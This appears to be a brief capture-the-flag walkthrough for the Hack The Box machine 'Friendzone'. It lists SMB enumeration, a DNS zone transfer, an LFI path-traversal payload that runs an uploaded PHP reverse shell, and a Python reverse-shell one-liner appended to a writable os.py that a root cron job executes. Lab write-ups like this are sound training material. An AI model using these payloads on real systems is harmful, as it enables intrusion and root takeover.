Friendzone - Hack The Box
N/A
USER
Enumeration
Enum standard + extra smb
nmap -sC -sV -O 10.10.10.123
nmap --script=smb-enum-shares 10.10.10.123
Grab cred.txt
smbclient //10.10.10.123/general
get creds.txt
Zone Transfer to find subdomains
dig axfr friendzone.red @10.10.10.123
Add subdomains to /etc/hosts
10.10.10.123 friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red
Login as administrator1 with credentials found from cred.txt
Upload reverse shell through SMB
smbclient //10.10.10.123/Development
put r
Prepare nc to grab reverse shell
nc -lnvp 4455
Use LFI through dashboard.php to trigger reverse shell.
With previous enumeration of smb shares we found the path to /etc/Development where our shell will be uploaded.
dashboard.php?image_id=a.jpg&pagename=../../../../../etc/Development/r
NOTE1:
Probably smart to upload a test file, like<?php phpinfo(); ?>, before going for the reverse shell.
NOTE2:
The php call will look something like this:<?php “include/”.include($_GET['pagename'].“.php”); ?>
Do not end your filename with.phpas this is already done in the code and you’ll create a double file ending.
Grab user: /home/friend/user.txt
Grab SSH-creds:
ls /var/www/htm/mysql_data.conf
(f*****:A*************)
ROOT
ssh friend@10.10.10.123
Look on executing services with pspy64:
2019/06/18 16:24:01 CMD: UID=0 PID=4059 | /bin/sh -c /opt/server_admin/reporter.py
2019/06/18 16:24:01 CMD: UID=0 PID=4058 | /bin/sh -c /opt/server_admin/reporter.py
2019/06/18 16:24:01 CMD: UID=0 PID=4057 | /usr/sbin/CRON -f
Investigate the script reporter.py and we find that it uses import os.
With ls -l1 we find that we have +r+w one the file /usr/lib/python2.7/os.py
Add a python reverse shell at the end of os.py and wait for cron to trigger it.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.8",4488));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Start nc -lvnp 4488 and grab root.txt